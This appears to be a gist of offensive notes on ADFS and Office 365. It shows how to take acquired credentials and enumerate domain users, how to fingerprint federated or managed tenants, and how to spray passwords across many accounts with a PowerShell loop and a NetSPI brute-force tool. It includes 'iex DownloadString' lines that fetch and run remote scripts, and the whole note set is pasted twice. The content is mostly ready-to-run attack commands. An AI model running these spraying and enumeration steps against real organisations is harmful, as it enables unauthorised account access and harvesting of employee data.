timelf123/ADFS Notes

## ADFS Notes

Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.

Install Apps

Download and install visual studio 10

Downoad and install the Lync SDK
https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
http://go.microsoft.com/fwlink/?LinkID=248583

Download and install Microsoft Online Services Sign-In Assistant for IT Professionals RTW
http://go.microsoft.com/fwlink/?LinkID=286152

get-command -Module MSOnline
get-command -Module MSOnlineExtended

Download and Install the Azure Active Directory Module for Windows PowerShell (64-bit version)
http://go.microsoft.com/fwlink/p/?linkid=236297


Import the scripts

git clone https://github.com/NetSPI/PowerShell

import-module PowerSkype.ps1
import-module Get-ADFSEndpoint.ps1

or

iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-ADFSEndpoint.ps1")
iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/PowerSkype.ps1")


Fingerprint Federate and Managed Domains
# Summary: managed = in ms cloud; federated = internally hosted

# Check if domain email is managed or federated
Get-ADFSEndpoint -email username@domain.com

Email     : username@domain.com
Type      : Federated
Domain    : domain.com
BrandName : domain.com
AuthURL   : https://idp.domain.com/idp/profile/SAML2/POST/SSO


# Check if domain is managed or federated
Get-SkypeFederation -domain domain.com

Domain                 : domain.com
MS=MS*                 : True
_sip._tcp              : True
_sip._tls              : False
_sipfederationtls._tcp : False

# Get skype status
Get-SkypeStatus -email username@domain.com


Information Gathering for Managed Domains

# Get list of emails for azure services - must be managed domain
# Reference: https://msdn.microsoft.com/en-us/library/azure/dn194123(v=azure.98).aspx
# Reference: https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
# See references for other command examples

# Get Domain Users
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
connect-msolservice -credential $credentials
Get-MsolDomain
Get-MsolUser


Information Gathering for federated Domains

# Get Domain Users
$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection
Get-PSSession

 Id Name            ComputerName    State         ConfigurationName     Availability
 -- ----            ------------    -----         -----------------     ------------
  2 Session2        outlook.offi... Opened        Microsoft.Exchange       Available

Enter-PSSession 2
Get-Command | Select-Object Name

Execute a single command and store results to excel file - get domain user information

$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:\temp\domain_users.csv -NoTypeInformation

# Super slow / dirty dictionary attack option
$Users = Get-Content C:\temp\users.txt
$Password = "Password"
$Users |
ForEach-Object {
    Write-Output "Testing $Password on $_"

    $PWord = ConvertTo-SecureString -String "$Password" -AsPlainText -Force
    $credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "$_", $PWord
    Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {get-user | select-object name -expandproperty name}
}


also.... https://blog.netspi.com/targeting-passwords-managed-federated-microsoft-accounts/
https://gallery.technet.microsoft.com/scriptcenter/Invoke-ADFSSecurityTokenReq-09e9c90c
https://github.com/NetSPI/PowerShell/blob/master/Invoke-ExternalDomainBruteforce.ps1
Invoke-ExternalDomainBruteforce -list .\emails.txt -password 'Password!' -domain company.com | ft -AutoSize


More notes from: https://gist.github.com/skillriver/783295e9c4bc0da63cc71eb7833535c0

# connect to azure and office365 with powershell
# 2016-01-13

# get password
$cred = Get-Credential

#office365 session
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic -AllowRedirection

Import-PSSession $Session

#azure AD connect
Connect-MsolService -Credential $cred

more notes from: https://gist.githubusercontent.com/skillriver/783295e9c4bc0da63cc71eb7833535c0/raw/c3e73f28c23987190b0d7f5dca6bc4985aca0010/GroupAzureADUPNSuffix.ps1

# Require the Azure Active Directory PowerShell Module
Import-Module MSOnline

# Credential and Connect
$msolcred = Get-Credential
Connect-MsolService -Credential $msolcred

# Group count of all UPN suffixes in your Azure AD
Get-MsolUser -All | Select UserPrincipalName, @{Name="UPNSuffix"; Expression={($_.UserPrincipalName.Split("@",2)[1])}} | Group UPNSuffix

	Below are some notes for grabbing a list of domain users and other information via ADFS using acquired credentials.

	Install Apps

	Download and install visual studio 10

	Downoad and install the Lync SDK
	https://www.microsoft.com/en-us/download/details.aspx?id=36824 (deprecated)
	http://go.microsoft.com/fwlink/?LinkID=248583

	Download and install Microsoft Online Services Sign-In Assistant for IT Professionals RTW
	http://go.microsoft.com/fwlink/?LinkID=286152

	get-command -Module MSOnline
	get-command -Module MSOnlineExtended

	Download and Install the Azure Active Directory Module for Windows PowerShell (64-bit version)
	http://go.microsoft.com/fwlink/p/?linkid=236297




	Import the scripts

	git clone https://github.com/NetSPI/PowerShell

	import-module PowerSkype.ps1
	import-module Get-ADFSEndpoint.ps1

	or

	iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Get-ADFSEndpoint.ps1")
	iex(New-Object net.webclient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/PowerSkype.ps1")


	Fingerprint Federate and Managed Domains
	# Summary: managed = in ms cloud; federated = internally hosted

	# Check if domain email is managed or federated
	Get-ADFSEndpoint -email username@domain.com

	Email : username@domain.com
	Type : Federated
	Domain : domain.com
	BrandName : domain.com
	AuthURL : https://idp.domain.com/idp/profile/SAML2/POST/SSO


	# Check if domain is managed or federated
	Get-SkypeFederation -domain domain.com

	Domain : domain.com
	MS=MS* : True
	_sip._tcp : True
	_sip._tls : False
	_sipfederationtls._tcp : False

	# Get skype status
	Get-SkypeStatus -email username@domain.com


	Information Gathering for Managed Domains

	# Get list of emails for azure services - must be managed domain
	# Reference: https://msdn.microsoft.com/en-us/library/azure/dn194123(v=azure.98).aspx
	# Reference: https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
	# See references for other command examples

	# Get Domain Users
	$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
	$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
	connect-msolservice -credential $credentials
	Get-MsolDomain
	Get-MsolUser


	Information Gathering for federated Domains

	# Get Domain Users
	$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
	$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
	New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection
	Get-PSSession

	Id Name ComputerName State ConfigurationName Availability
	-- ---- ------------ ----- ----------------- ------------
	2 Session2 outlook.offi... Opened Microsoft.Exchange Available

	Enter-PSSession 2
	Get-Command \| Select-Object Name

	Execute a single command and store results to excel file - get domain user information

	$PWord = ConvertTo-SecureString -String 'SecurePassword!' -AsPlainText -Force
	$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "username@domain.com", $PWord
	Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} \| Export-CSV c:\temp\domain_users.csv -NoTypeInformation

	# Super slow / dirty dictionary attack option
	$Users = Get-Content C:\temp\users.txt
	$Password = "Password"
	$Users \|
	ForEach-Object {
	Write-Output "Testing $Password on $_"

	$PWord = ConvertTo-SecureString -String "$Password" -AsPlainText -Force
	$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "$_", $PWord
	Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {get-user \| select-object name -expandproperty name}
	}


	also.... https://blog.netspi.com/targeting-passwords-managed-federated-microsoft-accounts/
	https://gallery.technet.microsoft.com/scriptcenter/Invoke-ADFSSecurityTokenReq-09e9c90c
	https://github.com/NetSPI/PowerShell/blob/master/Invoke-ExternalDomainBruteforce.ps1
	Invoke-ExternalDomainBruteforce -list .\emails.txt -password 'Password!' -domain company.com \| ft -AutoSize


	More notes from: https://gist.github.com/skillriver/783295e9c4bc0da63cc71eb7833535c0

	# connect to azure and office365 with powershell
	# 2016-01-13

	# get password
	$cred = Get-Credential

	#office365 session
	$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic -AllowRedirection

	Import-PSSession $Session

	#azure AD connect
	Connect-MsolService -Credential $cred

	more notes from: https://gist.githubusercontent.com/skillriver/783295e9c4bc0da63cc71eb7833535c0/raw/c3e73f28c23987190b0d7f5dca6bc4985aca0010/GroupAzureADUPNSuffix.ps1

	# Require the Azure Active Directory PowerShell Module
	Import-Module MSOnline

	# Credential and Connect
	$msolcred = Get-Credential
	Connect-MsolService -Credential $msolcred

	# Group count of all UPN suffixes in your Azure AD
	Get-MsolUser -All \| Select UserPrincipalName, @{Name="UPNSuffix"; Expression={($_.UserPrincipalName.Split("@",2)[1])}} \| Group UPNSuffix